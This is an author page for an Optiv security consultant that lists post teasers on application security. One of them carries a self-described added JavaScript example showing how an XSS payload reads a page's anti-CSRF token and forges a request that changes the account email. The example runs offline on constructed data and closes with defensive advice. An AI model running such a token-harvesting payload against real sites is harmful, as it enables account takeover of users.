Scott Johnson

Security Consultant

Scott Johnson is a security consultant with Optiv's application security team. His focus is on penetration testing, source code review, and mobile application assessments.


Bypassing CSRF Tokens via XSS

· By Scott Johnson, Tim MalcomVetter ·

Many web development platforms provide libraries that generate an anti-CSRF token, embed it in each form or request, and validate it on the server to prevent Cross-Site Request Forgery (CSRF). Those libraries are effective against classic cross-origin forgery and should be part of any web application. However, anti-CSRF tokens can still be bypassed under certain conditions: in particular, a script injected through Cross-Site Scripting (XSS) runs in the application's own origin, so it can read the token and submit it with a forged request.
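The following is an added example written for this page, not code from the Optiv post or its authors, illustrating the mechanism the title refers to. It simulates an XSS payload that fetches a settings page in the victim's origin, harvests the hidden anti-CSRF field, and builds a forged state-changing request that the server's token check accepts. The page HTML, the `csrf_token` field name, the `/account/settings` and `/account/email` paths and the token value are all constructed for the example; in a real payload `fetchPage` would be `fetch(path, { credentials: "include" }).then(r => r.text())`, which the same-origin policy permits because the script is running on the target site.

```javascript
// Added example (not from the original post). All data below is constructed.

// Constructed sample of a server-rendered page that carries the hidden token.
const SAMPLE_SETTINGS_PAGE = `
<html><body>
<form id="change-email" method="POST" action="/account/email">
  <input type="hidden" name="csrf_token" value="a1b2c3d4e5f6">
  <input type="email" name="email">
  <button>Save</button>
</form>
</body></html>`;

// Pull the value of a named hidden <input> out of raw HTML. A regex is used
// instead of DOMParser so the example also runs outside a browser (Node).
function extractCsrfToken(html, fieldName = "csrf_token") {
  const inputs = html.match(/<input\b[^>]*>/gi) || [];
  for (const tag of inputs) {
    const name = tag.match(/\bname\s*=\s*["']([^"']*)["']/i);
    if (!name || name[1] !== fieldName) continue;
    const value = tag.match(/\bvalue\s*=\s*["']([^"']*)["']/i);
    if (value) return value[1];
  }
  return null; // token field not present on this page
}

// Build the forged POST the injected script would send. Because the token is
// genuine, it is indistinguishable from a request the user made themselves.
function forgeRequest(token, attackerEmail) {
  const body = new URLSearchParams({ csrf_token: token, email: attackerEmail });
  return {
    method: "POST",
    path: "/account/email", // hypothetical endpoint
    headers: { "Content-Type": "application/x-www-form-urlencoded" },
    body: body.toString(),
  };
}

// The XSS payload: read the page (same origin, so the response is readable),
// harvest the token, and forge the request. fetchPage is injected so the
// example stays offline; in a browser it would be a same-origin fetch().
function stealAndForge(fetchPage, attackerEmail = "attacker@example.com") {
  const html = fetchPage("/account/settings");
  const token = extractCsrfToken(html);
  if (token === null) throw new Error("anti-CSRF token not found in page");
  return forgeRequest(token, attackerEmail);
}

// Simplified model of the server-side validation an anti-CSRF library does:
// compare the submitted token with the one bound to the session. Real
// libraries use constant-time comparison; the logic is the same.
function serverAcceptsRequest(request, sessionToken) {
  const params = new URLSearchParams(request.body);
  return params.get("csrf_token") === sessionToken;
}

// Stand-alone demonstration.
const forged = stealAndForge(() => SAMPLE_SETTINGS_PAGE);
console.log("forged body:", forged.body);
console.log("server accepts forged request:", serverAcceptsRequest(forged, "a1b2c3d4e5f6"));
console.log("server accepts guessed token:", serverAcceptsRequest(forgeRequest("guess", "x@y"), "a1b2c3d4e5f6"));
```

The check that fails here is not the token library's: the token is correct, so validation passes. The control that would have stopped this is eliminating the XSS (output encoding, a strict Content Security Policy) and limiting what a script in the origin can reach, for example by requiring re-authentication for sensitive changes. A token alone cannot distinguish a request assembled by injected script from one the user submitted.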


Black Hat Tools Arsenal: Burp-Hash Plugin, Part 2 - How it Works

· By Scott Johnson, Tim MalcomVetter, Matt South ·

This is a follow-up post about our Burp-Hash plugin for the Burp Suite that we presented at the Black Hat USA Tools Arsenal. You can read the backstory that inspired us to create the tool in Part 1 of this post. You also can watch a quick two-minute video overview of the plugin on YouTube.


Black Hat Tools Arsenal: Burp-Hash Plugin – Part 1

· By Scott Johnson, Tim MalcomVetter, Matt South ·

One day a few months back, teammates Matt South and Tim MalcomVetter reviewed a report from an application security assessment performed by another teammate, Scott Johnson. These reviews occur as part of our normal quality assurance process, but it’s always interesting, and even fun, when a teammate comes across a rare type of vulnerability.
